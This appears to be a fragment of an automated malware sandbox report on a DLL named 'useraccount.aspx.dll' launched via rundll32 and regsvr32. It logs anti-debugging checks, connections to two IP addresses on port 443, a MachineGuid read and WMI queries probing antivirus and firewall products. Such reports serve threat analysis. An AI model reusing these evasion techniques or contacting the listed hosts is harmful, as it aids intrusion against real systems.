Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F116240 mov ecx, dword ptr fs:[00000030h] 36_2_7F116240
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F0EAAE0 mov ecx, dword ptr fs:[00000030h] 36_2_7F0EAAE0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F108930 mov eax, dword ptr fs:[00000030h] 36_2_7F108930
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F0D6980 mov edx, dword ptr fs:[00000030h] 36_2_7F0D6980
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F10C060 mov ecx, dword ptr fs:[00000030h] 36_2_7F10C060
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDB6280 GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc, 13_2_7EDB6280
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_6CF92EFD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 13_2_6CF92EFD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EE03887 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 13_2_7EE03887
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EE07713 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 13_2_7EE07713
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7E3AD5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 18_2_7F7E3AD5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7E3887 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 18_2_7F7E3887
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7E7713 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 18_2_7F7E7713
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_6B542EFD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 36_2_6B542EFD
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F127713 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 36_2_7F127713
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F123AD5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 36_2_7F123AD5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F123887 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 36_2_7F123887

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\regsvr32.exe Network Connect: 194.67.193.12 443
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 194.67.193.13 443
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EE0363C cpuid 13_2_7EE0363C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 13_2_7EE1CEEA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 13_2_7EE1CAE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 13_2_7EE1CA48
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 13_2_7EE1681C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 13_2_7EE1C9FD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetACP,IsValidCodePage,GetLocaleInfoW, 13_2_7EE1C75B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 13_2_7EE1629F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 13_2_7EE1D0BF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7F0FF4 GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, 18_2_7F7F0FF4
Source: C:\Windows\SysWOW64\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\rundll32.exe WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Program Files\Windows Defender\MpCmdRun.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Program Files\Windows Defender\MpCmdRun.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct